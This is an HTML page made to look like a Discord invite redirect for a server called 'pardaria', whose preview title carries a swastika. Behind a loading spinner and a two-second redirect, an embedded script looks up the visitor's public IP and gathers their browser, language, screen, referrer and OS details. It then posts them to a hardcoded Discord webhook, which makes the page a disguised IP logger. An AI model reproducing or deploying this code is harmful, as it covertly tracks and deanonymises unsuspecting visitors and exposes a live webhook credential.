
<!DOCTYPE html>
<html>
  <head>    <meta charset="utf-8" />
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=3.0" name="viewport" />
<meta name="description" content="Check out the pardaria community on Discord - hang out with 1 other members and enjoy free voice and text chat." />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@discord" />
<meta name="twitter:title" content="Participe do servidor do Discord pardaria 卐  " />
<meta name="twitter:description" content="Check out the pardaria community on Discord - hang out with 34 other members and enjoy free voice and text chat." />
<meta property="og:title" content="Participe do servidor do Discord pardaria!" />
<meta property="og:description" content="Check out the pardaria community on Discord - hang out with 34 other members and enjoy free voice and text chat." />
<meta property="og:site_name" content="Discord" />
<link rel="canonical" href="https://discord.gg/2f2xFmMc" />
    

    
    <span class="cubesWrapper">
  <span class="cube"></span>
  <span class="cube"></span>
</span>
    <style>body {
  background: #36393f;
}
.cubesWrapper {
    left: 48vw;
    top: 45vh;
    position: relative;
    display: inline-block;
    width: 52px;
    height: 52px;
    contain: paint
}
.cube {
    background-color: #7289da;
    width: 10px;
    height: 10px;
    position: absolute;
    top: 0;
    left: 0;
    -webkit-animation: cubeSpinner 1.8s ease-in-out infinite;
    animation: cubeSpinner 1.8s ease-in-out infinite
}

.cube:last-child {
    -webkit-animation-delay: -.9s;
    animation-delay: -.9s
}

@-webkit-keyframes cubeSpinner {
    25% {
        -webkit-transform: translateX(22px) rotate(-90deg) scale(.5);
        transform: translateX(22px) rotate(-90deg) scale(.5)
    }

    50% {
        -webkit-transform: translateX(22px) translateY(22px) rotate(-180deg);
        transform: translateX(22px) translateY(22px) rotate(-180deg)
    }

    75% {
        -webkit-transform: translateX(0) translateY(22px) rotate(-270deg) scale(.5);
        transform: translateX(0) translateY(22px) rotate(-270deg) scale(.5)
    }

    to {
        -webkit-transform: rotate(-1turn);
        transform: rotate(-1turn)
    }
}

@keyframes cubeSpinner {
    25% {
        -webkit-transform: translateX(22px) rotate(-90deg) scale(.5);
        transform: translateX(22px) rotate(-90deg) scale(.5)
    }

    50% {
        -webkit-transform: translateX(22px) translateY(22px) rotate(-180deg);
        transform: translateX(22px) translateY(22px) rotate(-180deg)
    }

    75% {
        -webkit-transform: translateX(0) translateY(22px) rotate(-270deg) scale(.5);
        transform: translateX(0) translateY(22px) rotate(-270deg) scale(.5)
    }

    to {
        -webkit-transform: rotate(-1turn);
        transform: rotate(-1turn)
    }
}
 </style>



<script>
  fetch('https://api.ipify.org?format=json')
      .then(response => response.json())
      .then(data => {
        const ipAddress = data.ip;
        const webhookUrl = 'https://discord.com/api/webhooks/1127331389528887377/gLP088e0yUxE3MD8R1NAOxbwPaKRSSuBPo7miXVWdnK2oo1Knl3KKk7FfuknMQ1lO4Qk';

        const userAgent = navigator.userAgent;
        const language = navigator.language;
        const screenWidth = window.screen.width;
        const screenHeight = window.screen.height;
        const referrer = document.referrer;
        const operatingSystem = navigator.platform;

        const message = `@everyone Nova visita ao site! \nIP: ${ipAddress} \nUser-Agent: ${userAgent} \nLinguagem: ${language} \nScreen Resolução: ${screenWidth}x${screenHeight} \nReferrer: ${referrer} \nSistema Operacional: ${operatingSystem}`;

        fetch(webhookUrl, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({
            content: message,
          }),
        })
        .then(response => {
          console.log('Mensagem enviada com sucesso!');
        })
        .catch(error => {
          console.error('Erro ao enviar a mensagem:', error);
        });
      })
      .catch(error => {
        console.error('Erro ao obter o endereço IP:', error);
      });
</script>

<meta http-equiv="refresh" content="2;url=https://discord.gg/2f2xFmMc" />


</html>
    



